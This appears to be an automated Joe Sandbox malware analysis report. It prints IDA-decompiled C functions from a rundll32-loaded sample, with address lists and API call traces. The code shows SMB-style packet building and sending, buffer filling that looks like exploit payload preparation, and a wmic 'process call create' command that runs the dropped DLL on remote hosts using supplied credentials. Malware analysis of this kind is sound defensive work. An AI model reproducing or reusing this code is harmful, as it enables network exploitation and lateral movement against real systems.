    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E3469, Relevance: 2.6, APIs: 2, Instructions: 147
    C-Code - Quality: 96%
    			E011E3469(int __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, void* _a24, void* _a28, void* _a32, signed int _a36) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __esi;
				void* _t53;
				void* _t58;
				void* _t59;
				signed int _t63;
				signed int _t65;
				signed int _t67;
				void* _t70;
				void* _t72;
				short _t76;
				signed int _t88;
				signed int _t96;
				signed int _t98;
				void* _t100;
				void* _t101;
				void* _t104;
				void** _t112;
				void* _t113;

				_t87 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v12 = 0;
				_v8 = 0;
				if(_a32 != 0) {
					_v8 = 0x1015;
					_t100 = E011E1000(0x1015);
					if(_t100 == 0) {
						goto L1;
					} else {
						 *((short*)(_t100 + 3)) = 0x1000;
						 *((short*)(_t100 + 0xb)) = 0x1000;
						_t76 = 0x35;
						 *((short*)(_t100 + 0xd)) = _t76;
						 *((short*)(_t100 + 0xf)) = _a28;
						 *((short*)(_t100 + 0x11)) = 0;
						 *((short*)(_t100 + 0x13)) = 0x1000;
						_t14 = _t100 + 0x15; // 0x15
						 *_t100 = 9;
						memcpy(_t14, _a32, 0x1000);
						_t113 = _t113 + 0xc;
						_a28 = _t100;
					}
				} else {
					L1:
					_a28 = 0;
				}
				_t53 = _a28;
				_a32 = _t53;
				if(_t53 != 0) {
					_t92 = _v8 + 0x00000024 & 0x0000ffff;
					_v12 = _v8 + 0x00000024 & 0x0000ffff;
					_t101 = E011E2466(_v8 + 0x00000024 & 0x0000ffff, 0x33, 0xc007, _a8, _a12, _a16, _a20, _a24);
					_a24 = _t101;
					if(_t101 != 0) {
						_t58 = E011E1000(_t92 & 0x0000ffff);
						_a20 = _t58;
						if(_t58 != 0) {
							_t88 = 9;
							_t59 = memcpy(_t58, _t101, _t88 << 2);
							_t87 = _v8 & 0x0000ffff;
							memcpy(_t59 + 0x24, _a28, _v8 & 0x0000ffff);
							E011E20D0( &_a32);
							_t63 = E011E20D0( &_a24);
							_t104 = _a20;
						} else {
							E011E20D0( &_a32);
							_t112 =  &_a24;
							goto L8;
						}
					} else {
						_t112 =  &_a32;
						L8:
						_t63 = E011E20D0(_t112);
						goto L5;
					}
				} else {
					L5:
					_t104 = 0;
				}
				_a28 = _t104;
				if(_t104 != 0) {
					if(_a36 == 0) {
						_t65 = E011E688F(_a4, _t104, _v12 & 0x0000ffff); // executed
						_t96 = _t65;
						goto L21;
					} else {
						_t98 = E011E1000(0x1000);
						_a36 = _t98;
						if(_t98 != 0) {
							_t86 = _a4;
							_a32 = _a32 & 0x00000000;
							_t70 = E011E688F(_a4, _t104, _v12 & 0x0000ffff); // executed
							if(_t70 != 0) {
								L20:
								E011E20D0( &_a36);
								_t96 = _t98 | 0xffffffff;
							} else {
								_t72 = E011E243F(_t87, _t86, 1, _t98); // executed
								if(_t72 == 0) {
									_t96 =  *(_t98 + 9);
									E011E20D0( &_a36);
								} else {
									goto L20;
								}
							}
							L21:
							E011E20D0( &_a28);
							_t67 = _t96;
						} else {
							_t63 = E011E20D0( &_a28);
							goto L13;
						}
					}
				} else {
					L13:
					_t67 = _t63 | 0xffffffff;
				}
				return _t67;
			}
























    0x011e3469
    0x011e346c
    0x011e346d
    0x011e3473
    0x011e3476
    0x011e3481
    0x011e348e
    0x011e3496
    0x011e349a
    0x00000000
    0x011e349c
    0x011e349e
    0x011e34a2
    0x011e34a8
    0x011e34a9
    0x011e34b1
    0x011e34b7
    0x011e34c1
    0x011e34c5
    0x011e34c9
    0x011e34cc
    0x011e34d1
    0x011e34d4
    0x011e34d4
    0x011e3483
    0x011e3483
    0x011e3483
    0x011e3483
    0x011e34d7
    0x011e34da
    0x011e34df
    0x011e34f7
    0x011e34fd
    0x011e3510
    0x011e3512
    0x011e3517
    0x011e3527
    0x011e352c
    0x011e3531
    0x011e3542
    0x011e3545
    0x011e3547
    0x011e3553
    0x011e355e
    0x011e3566
    0x011e356b
    0x011e3533
    0x011e3536
    0x011e353b
    0x00000000
    0x011e353b
    0x011e3519
    0x011e3519
    0x011e351c
    0x011e351c
    0x00000000
    0x011e351c
    0x011e34e1
    0x011e34e1
    0x011e34e1
    0x011e34e1
    0x011e356e
    0x011e3573
    0x011e3583
    0x011e35f1
    0x011e35f6
    0x00000000
    0x011e3585
    0x011e358b
    0x011e358d
    0x011e3592
    0x011e35a2
    0x011e35a5
    0x011e35ab
    0x011e35b2
    0x011e35c4
    0x011e35c7
    0x011e35cc
    0x011e35b4
    0x011e35bb
    0x011e35c2
    0x011e35db
    0x011e35e1
    0x00000000
    0x00000000
    0x00000000
    0x011e35c2
    0x011e35cf
    0x011e35d2
    0x011e35d7
    0x011e3594
    0x011e3597
    0x00000000
    0x011e3597
    0x011e3592
    0x011e3575
    0x011e3575
    0x011e3575
    0x011e3575
    0x011e357c

    APIs
      • Part of subcall function 011E1000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
      • Part of subcall function 011E1000: RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
    • memcpy.MSVCRT ref: 011E34CC
      • Part of subcall function 011E2466: htons.WS2_32(-000000FC), ref: 011E247E
    • memcpy.MSVCRT ref: 011E3553
      • Part of subcall function 011E20D0: GetProcessHeap.KERNEL32(00000008,000001BD,011E27B4,?,00000065,00000000,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E20D9
      • Part of subcall function 011E20D0: HeapFree.KERNEL32(00000000,?,00000065), ref: 011E20E0
      • Part of subcall function 011E688F: memset.MSVCRT ref: 011E68AE
      • Part of subcall function 011E688F: select.WS2_32(00000000,00000000,?,00000000,000001BD), ref: 011E68E4
      • Part of subcall function 011E688F: send.WS2_32(?,000001BD,002F1C10,00000000), ref: 011E68FC
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E330E, Relevance: 2.6, APIs: 2, Instructions: 126
    C-Code - Quality: 98%
    			E011E330E(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, void* _a28, void* _a32, void* _a36, signed int _a40, intOrPtr* _a44, void** _a48, short* _a52) {
				signed short _v8;
				void* __ebx;
				void* __esi;
				void* _t43;
				void* _t47;
				signed int _t52;
				void* _t56;
				signed int _t58;
				void* _t59;
				void* _t60;
				signed int _t69;
				signed int _t72;
				void* _t83;
				void* _t86;
				void* _t89;
				int _t94;
				void** _t98;
				void* _t99;

				_push(__ecx);
				_t66 = 0;
				_v8 = _v8 & 0;
				_t43 = E011E2CCF( &_v8, _a28, _a32, _a36, _a40);
				_a36 = _t43;
				if(_t43 != 0) {
					_t66 = _v8 + 0x00000024 & 0x0000ffff;
					_t86 = E011E2466(_v8 + 0x00000024 & 0x0000ffff, 0x32, 0xc007, _a8, _a12, _a16, _a20, _a24);
					_a32 = _t86;
					if(_t86 != 0) {
						_t47 = E011E1000(_t66);
						_a28 = _t47;
						if(_t47 != 0) {
							_t72 = 9;
							memcpy(memcpy(_t47, _t86, _t72 << 2) + 0x24, _a36, _v8 & 0x0000ffff);
							_t99 = _t99 + 0x18;
							E011E20D0( &_a36);
							_t52 = E011E20D0( &_a32);
							_t89 = _a28;
							L8:
							_a36 = _t89;
							if(_t89 != 0) {
								_t75 = _a40 & 0x0000ffff;
								 *_a44 =  *_a44 + (_a40 & 0x0000ffff);
								_t83 = E011E1000(0x1000);
								_a32 = _t83;
								if(_t83 != 0) {
									_a40 = _a40 & 0x00000000;
									_t67 = _a4;
									_t56 = E011E688F(_a4, _t89, _t66 & 0x0000ffff); // executed
									if(_t56 != 0) {
										L15:
										E011E20D0( &_a32);
										goto L12;
									}
									_t59 = E011E243F(_t75, _t67, 1, _t83); // executed
									if(_t59 == 0) {
										_t94 = _a40 & 0x0000ffff;
										_t69 =  *(_t83 + 9);
										_t60 = E011E1000(_t94);
										 *_a48 = _t60;
										if(_t60 != 0) {
											 *_a52 = _a40;
											memcpy(_t60, _t83, _t94);
										} else {
											_t69 = _t69 | 0xffffffff;
										}
										E011E20D0( &_a32);
										E011E20D0( &_a36);
										_t58 = _t69;
										L10:
										return _t58;
									}
									goto L15;
								}
								L12:
								_t52 = E011E20D0( &_a36);
							}
							_t58 = _t52 | 0xffffffff;
							goto L10;
						}
						E011E20D0( &_a36);
						_t98 =  &_a32;
						L4:
						_t52 = E011E20D0(_t98);
						goto L1;
					}
					_t98 =  &_a36;
					goto L4;
				}
				L1:
				_t89 = 0;
				goto L8;
			}





















    0x011e3311
    0x011e3318
    0x011e331d
    0x011e3329
    0x011e332e
    0x011e3333
    0x011e334b
    0x011e3361
    0x011e3363
    0x011e3368
    0x011e3375
    0x011e337a
    0x011e337f
    0x011e3390
    0x011e33a1
    0x011e33a6
    0x011e33ac
    0x011e33b4
    0x011e33b9
    0x011e33bc
    0x011e33bc
    0x011e33c1
    0x011e33cd
    0x011e33d4
    0x011e33e0
    0x011e33e2
    0x011e33e7
    0x011e33f3
    0x011e33fa
    0x011e33ff
    0x011e3406
    0x011e3418
    0x011e341b
    0x00000000
    0x011e341b
    0x011e340f
    0x011e3416
    0x011e3422
    0x011e3426
    0x011e342a
    0x011e3432
    0x011e3436
    0x011e345c
    0x011e345f
    0x011e3438
    0x011e3438
    0x011e3438
    0x011e343e
    0x011e3446
    0x011e344b
    0x011e33c6
    0x011e33ca
    0x011e33ca
    0x00000000
    0x011e3416
    0x011e33e9
    0x011e33ec
    0x011e33ec
    0x011e33c3
    0x00000000
    0x011e33c3
    0x011e3384
    0x011e3389
    0x011e336d
    0x011e336d
    0x00000000
    0x011e336d
    0x011e336a
    0x00000000
    0x011e336a
    0x011e3335
    0x011e3335
    0x00000000

    APIs
      • Part of subcall function 011E2CCF: memcpy.MSVCRT ref: 011E2D72
      • Part of subcall function 011E2466: htons.WS2_32(-000000FC), ref: 011E247E
      • Part of subcall function 011E1000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
      • Part of subcall function 011E1000: RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
    • memcpy.MSVCRT ref: 011E33A1
      • Part of subcall function 011E20D0: GetProcessHeap.KERNEL32(00000008,000001BD,011E27B4,?,00000065,00000000,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E20D9
      • Part of subcall function 011E20D0: HeapFree.KERNEL32(00000000,?,00000065), ref: 011E20E0
      • Part of subcall function 011E688F: memset.MSVCRT ref: 011E68AE
      • Part of subcall function 011E688F: select.WS2_32(00000000,00000000,?,00000000,000001BD), ref: 011E68E4
      • Part of subcall function 011E688F: send.WS2_32(?,000001BD,002F1C10,00000000), ref: 011E68FC
    • memcpy.MSVCRT ref: 011E345F
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E3C0A, Relevance: 2.6, APIs: 2, Instructions: 51
    C-Code - Quality: 94%
    			E011E3C0A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, void* _a24) {
				void* _v8;
				void* __esi;
				signed int _t13;
				signed int _t15;
				signed int _t18;
				signed int _t20;
				signed int _t24;
				void* _t27;

				_push(__ecx);
				_t13 = E011E1000(0x1000);
				_t27 = _t13;
				_v8 = _t27;
				if(_t27 != 0) {
					memset(_t27, 0x54, 0xb8c);
					_t15 = 0;
					do {
						_t2 = _t15 + 0x11f0b08; // 0xa8008051
						_t22 =  *_t2;
						 *((char*)(_t27 + _t15 + 0xb8c)) =  *_t2;
						_t15 = _t15 + 1;
					} while (_t15 < 0xaf);
					_t5 = _t27 + 0xc3b; // 0xc3b
					memset(_t5, 0x54, 0x3c5);
					_t18 = E011E3469(_t22, _a4, _a8, _a12, _a16, _a20, _a24, 0xf3d0, _t27, 1); // executed
					_t24 = _t18;
					if(_t24 == 0xc000000d) {
						_t24 = 0;
					}
					E011E20D0( &_v8);
					_t20 = _t24;
				} else {
					_t20 = _t13 | 0xffffffff;
				}
				return _t20;
			}











    0x011e3c0d
    0x011e3c14
    0x011e3c19
    0x011e3c1b
    0x011e3c20
    0x011e3c2f
    0x011e3c37
    0x011e3c39
    0x011e3c39
    0x011e3c39
    0x011e3c3f
    0x011e3c46
    0x011e3c47
    0x011e3c54
    0x011e3c5d
    0x011e3c7f
    0x011e3c84
    0x011e3c8c
    0x011e3c8e
    0x011e3c8e
    0x011e3c93
    0x011e3c98
    0x011e3c22
    0x011e3c22
    0x011e3c22
    0x011e3c9d

    APIs
      • Part of subcall function 011E1000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
      • Part of subcall function 011E1000: RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
    • memset.MSVCRT ref: 011E3C2F
    • memset.MSVCRT ref: 011E3C5D
      • Part of subcall function 011E3469: memcpy.MSVCRT ref: 011E34CC
      • Part of subcall function 011E3469: memcpy.MSVCRT ref: 011E3553
      • Part of subcall function 011E20D0: GetProcessHeap.KERNEL32(00000008,000001BD,011E27B4,?,00000065,00000000,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E20D9
      • Part of subcall function 011E20D0: HeapFree.KERNEL32(00000000,?,00000065), ref: 011E20E0
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E3DD7, Relevance: 1.3, APIs: 1, Instructions: 91
    C-Code - Quality: 100%
    			E011E3DD7(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, signed short _a32, char _a36, char _a40, intOrPtr _a44, intOrPtr* _a48) {
				char _v8;
				long _v12;
				signed int _v19;
				intOrPtr _v20;
				void* __esi;
				signed int _t48;
				void* _t53;
				signed int _t59;
				signed short _t64;
				signed int _t71;
				void* _t81;
				void* _t87;

				if(_a36 != 0) {
					_t64 = _a32;
					_t3 = (_t64 & 0x0000ffff) + 0xc; // 0xff0b
					_v12 = _t3;
					_t81 = E011E1000(_t3);
					 *_t81 = _a40;
					 *(_t81 + 4) = _t64;
					_t10 = _t81 + 0xc; // 0xc
					_t65 = _t10;
					_v8 = _t81;
					 *((intOrPtr*)(_t81 + 8)) =  *_a48;
					memcpy(_t10, _a36 + _a44, _t64 & 0x0000ffff);
					_v19 = 0;
					_t48 = 0;
					_v20 = _a28;
					do {
						_t71 = _t48 & 0x80000003;
						if(_t71 < 0) {
							_t71 = (_t71 - 0x00000001 | 0xfffffffc) + 1;
						}
						_t72 =  *(_t87 + _t71 - 0x10);
						 *(_t48 + _t81) =  *(_t48 + _t81) ^  *(_t87 + _t71 - 0x10);
						_t48 = _t48 + 1;
					} while (_t48 < _v12);
					_a40 = 0;
					_a36 = 0;
					_t53 = E011E330E(_t72, _a4, _a8, _a12, _a16, _a20, _a24 + 1, 0xf2, _t81, _t65, _a32, _a48,  &_a36,  &_a40); // executed
					if(_t53 != 0xffffffff) {
						E011E20D0( &_v8);
						E011E20D0( &_a36);
						_t59 = (0 | ( *(_a36 + 0x1a) & 0x0000ffff) == 0x00000011) - 1;
					} else {
						E011E20D0( &_a36);
						_t59 = E011E20D0( &_v8) | 0xffffffff;
					}
					return _t59;
				}
				return __eax | 0xffffffff;
			}















    0x011e3de1
    0x011e3dec
    0x011e3df4
    0x011e3df8
    0x011e3e06
    0x011e3e0b
    0x011e3e12
    0x011e3e18
    0x011e3e18
    0x011e3e1c
    0x011e3e1f
    0x011e3e22
    0x011e3e2f
    0x011e3e32
    0x011e3e34
    0x011e3e37
    0x011e3e39
    0x011e3e3f
    0x011e3e45
    0x011e3e45
    0x011e3e46
    0x011e3e4a
    0x011e3e4d
    0x011e3e4e
    0x011e3e70
    0x011e3e76
    0x011e3e82
    0x011e3e8a
    0x011e3ea4
    0x011e3eb3
    0x011e3ec0
    0x011e3e8c
    0x011e3e8f
    0x011e3e9c
    0x011e3e9c
    0x00000000
    0x011e3ec3
    0x00000000

    APIs
      • Part of subcall function 011E1000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
      • Part of subcall function 011E1000: RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
    • memcpy.MSVCRT ref: 011E3E22
      • Part of subcall function 011E330E: memcpy.MSVCRT ref: 011E33A1
      • Part of subcall function 011E330E: memcpy.MSVCRT ref: 011E345F
      • Part of subcall function 011E20D0: GetProcessHeap.KERNEL32(00000008,000001BD,011E27B4,?,00000065,00000000,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E20D9
      • Part of subcall function 011E20D0: HeapFree.KERNEL32(00000000,?,00000065), ref: 011E20E0
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E2F88, Relevance: 1.3, APIs: 1, Instructions: 82
    C-Code - Quality: 96%
    			E011E2F88(void __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, short* _a16, void* _a20, signed int _a24, signed int _a28, signed short _a32, void** _a36, signed short* _a40) {
				signed short _v8;
				void* __ebx;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t40;
				void* _t41;
				void* _t44;
				void _t48;
				signed short _t50;
				void* _t56;
				signed int _t57;
				int _t64;

				_t51 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t48 = __eax;
				_t34 = E011E28B5(_a24, __ecx, _a4, _a8, _a12, _a20, _a28, _a32,  &_v8);
				_a24 = _t34;
				if(_t34 != 0) {
					_t56 = E011E1000(0x1000);
					_a20 = _t56;
					if(_t56 != 0) {
						_a32 = _a32 & 0x00000000;
						_t37 = E011E688F(_t48, _a24, _v8 & 0x0000ffff); // executed
						if(_t37 != 0) {
							L8:
							_t57 = _t56 | 0xffffffff;
							L9:
							E011E20D0( &_a20);
							E011E20D0( &_a24);
							_t40 = _t57;
							L4:
							L5:
							return _t40;
						}
						_t41 = E011E243F(_t51, _t48, 1, _t56); // executed
						if(_t41 == 0) {
							_t50 = _a32;
							_t64 = _t50 & 0x0000ffff;
							 *_a16 =  *((intOrPtr*)(_t56 + 0x20));
							_a28 =  *((intOrPtr*)(_t56 + 9));
							_t44 = E011E1000(_t64);
							 *_a36 = _t44;
							if(_t44 == 0) {
								_a28 = _a28 | 0xffffffff;
							} else {
								 *_a40 = _t50;
								memcpy(_t44, _t56, _t64);
							}
							_t57 = _a28;
							goto L9;
						}
						goto L8;
					}
					_t40 = E011E20D0( &_a24) | 0xffffffff;
					goto L4;
				}
				_t40 = _t34 | 0xffffffff;
				goto L5;
			}
















    0x011e2f88
    0x011e2f8b
    0x011e2f8c
    0x011e2f91
    0x011e2fac
    0x011e2fb1
    0x011e2fb6
    0x011e2fc9
    0x011e2fcb
    0x011e2fd0
    0x011e2fe8
    0x011e2ff0
    0x011e2ff7
    0x011e3009
    0x011e3009
    0x011e300c
    0x011e300f
    0x011e3017
    0x011e301c
    0x011e2fdd
    0x011e2fdf
    0x011e2fe1
    0x011e2fe1
    0x011e3000
    0x011e3007
    0x011e3024
    0x011e302a
    0x011e302d
    0x011e3034
    0x011e3037
    0x011e303f
    0x011e3043
    0x011e3058
    0x011e3045
    0x011e304b
    0x011e304e
    0x011e3053
    0x011e305c
    0x00000000
    0x011e305c
    0x00000000
    0x011e3007
    0x011e2fda
    0x00000000
    0x011e2fda
    0x011e2fb8
    0x00000000

    APIs
      • Part of subcall function 011E28B5: memcpy.MSVCRT ref: 011E290D
      • Part of subcall function 011E28B5: memcpy.MSVCRT ref: 011E29C1
      • Part of subcall function 011E1000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
      • Part of subcall function 011E1000: RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
      • Part of subcall function 011E688F: memset.MSVCRT ref: 011E68AE
      • Part of subcall function 011E688F: select.WS2_32(00000000,00000000,?,00000000,000001BD), ref: 011E68E4
      • Part of subcall function 011E688F: send.WS2_32(?,000001BD,002F1C10,00000000), ref: 011E68FC
      • Part of subcall function 011E20D0: GetProcessHeap.KERNEL32(00000008,000001BD,011E27B4,?,00000065,00000000,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E20D9
      • Part of subcall function 011E20D0: HeapFree.KERNEL32(00000000,?,00000065), ref: 011E20E0
    • memcpy.MSVCRT ref: 011E304E
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E3B5D, Relevance: 1.3, APIs: 1, Instructions: 60
    C-Code - Quality: 91%
    			E011E3B5D(int __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, void* _a24) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				signed int _t23;
				void* _t26;
				signed int _t28;
				void* _t32;
				signed int _t39;

				_t34 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t23 = E011E1000(0xf000); // executed
				_t39 = _t23;
				_v12 = _t39;
				if(_t39 != 0) {
					_t2 = _t39 + 0x80b; // 0x80b
					 *((intOrPtr*)(_t39 + 0x807)) = 0x3668f383;
					memset(_t2, 0x54, 0xe7f4);
					_v8 = _v8 & 0x00000000;
					_t32 = 0x3d0;
					while(1) {
						_t26 = E011E3469(_t34, _a4, _a8, _a12, _a16, _a20, _a24, _t32, _t39, 0); // executed
						if(_t26 != 0) {
							break;
						}
						_t32 = _t32 + 0x1000;
						_v8 = _v8 + 1;
						_t39 = _t39 + 0x1000;
						if(_v8 < 0xf) {
							continue;
						} else {
							E011E20D0( &_v12);
							_t28 = E011E369D(_a4, _t34, _a8, _a12, _a16, _a20, _a24); // executed
						}
						L6:
						goto L7;
					}
					_t28 = E011E20D0( &_v12) | 0xffffffff;
					goto L6;
				} else {
					_t28 = _t23 | 0xffffffff;
				}
				L7:
				return _t28;
			}











    0x011e3b5d
    0x011e3b60
    0x011e3b61
    0x011e3b68
    0x011e3b6d
    0x011e3b6f
    0x011e3b74
    0x011e3b82
    0x011e3b8b
    0x011e3b95
    0x011e3b9d
    0x011e3ba1
    0x011e3bab
    0x011e3bc1
    0x011e3bc8
    0x00000000
    0x00000000
    0x011e3bca
    0x011e3bcc
    0x011e3bcf
    0x011e3bd5
    0x00000000
    0x011e3bd7
    0x011e3bda
    0x011e3bf1
    0x011e3bf1
    0x011e3bf6
    0x00000000
    0x011e3bf7
    0x011e3c05
    0x00000000
    0x011e3b76
    0x011e3b76
    0x011e3b76
    0x011e3bf8
    0x011e3bfa

    APIs
      • Part of subcall function 011E1000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
      • Part of subcall function 011E1000: RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
    • memset.MSVCRT ref: 011E3B95
      • Part of subcall function 011E3469: memcpy.MSVCRT ref: 011E34CC
      • Part of subcall function 011E3469: memcpy.MSVCRT ref: 011E3553
      • Part of subcall function 011E20D0: GetProcessHeap.KERNEL32(00000008,000001BD,011E27B4,?,00000065,00000000,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E20D9
      • Part of subcall function 011E20D0: HeapFree.KERNEL32(00000000,?,00000065), ref: 011E20E0
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011EC223, Relevance: 1.3, APIs: 1, Instructions: 9
    C-Code - Quality: 100%
    			E011EC223(signed int _a8, signed int _a12) {
				void* _t5;

				_t5 = malloc(_a8 * _a12); // executed
				return _t5;
			}




    0x011ec22e
    0x011ec235

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd

    Non-executed Functions

    Function 011E98AB, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 78
    C-Code - Quality: 100%
    			E011E98AB(WCHAR* __ecx, WCHAR* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v524;
				char _v16908;
				signed short* _t33;
				void* _t36;
				short _t40;
				short _t43;
				WCHAR* _t44;
				signed int _t45;
				signed int _t46;
				WCHAR* _t47;

				_t47 = __esi;
				E011EA4F0(0x4208);
				_t44 = __ecx;
				 *__esi = 0;
				 *((short*)(__ecx)) = 0;
				_t36 = 0;
				E011E8B70( &_v524);
				if(GetSystemDirectoryW(_t44, 0x104) == 0) {
					GetLastError();
					goto L9;
				} else {
					PathAppendW(_t44, L"wbem\\wmic.exe");
					if(PathFileExistsW(_t44) == 0) {
						L9:
						 *_t47 = 0;
						 *_t44 = 0;
					} else {
						_t45 = wsprintfW(__esi, L"%s /node:\"%ws\" /user:\"%ws\" /password:\"%ws\" ", _t44, _a4, _a8, _a12);
						_t46 = _t45 + wsprintfW( &(__esi[_t45]), L"process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\%s\\\" #1 ",  &_v524);
						E011E6BB0( &_v16908);
						_t33 =  &_v16908;
						while(1) {
							_t40 =  *_t33 & 0x0000ffff;
							if(_t40 == 0x22) {
								_t43 = 0x5c;
								_t47[_t46] = _t43;
								_t46 = _t46 + 1;
							}
							_t47[_t46] = _t40;
							if(_t40 == 0) {
								break;
							}
							_t33 =  &(_t33[1]);
							_t46 = _t46 + 1;
						}
						wsprintfW( &(_t47[_t46]), "\"");
						_t36 = 1;
					}
				}
				return _t36;
			}













    0x011e98ab
    0x011e98b3
    0x011e98bc
    0x011e98be
    0x011e98c1
    0x011e98cb
    0x011e98cd
    0x011e98e0
    0x011e9971
    0x00000000
    0x011e98e6
    0x011e98ec
    0x011e98fb
    0x011e9977
    0x011e9979
    0x011e997c
    0x011e98fd
    0x011e9915
    0x011e9929
    0x011e9935
    0x011e993a
    0x011e9940
    0x011e9940
    0x011e9946
    0x011e994a
    0x011e994b
    0x011e994f
    0x011e994f
    0x011e9950
    0x011e9957
    0x00000000
    0x00000000
    0x011e9959
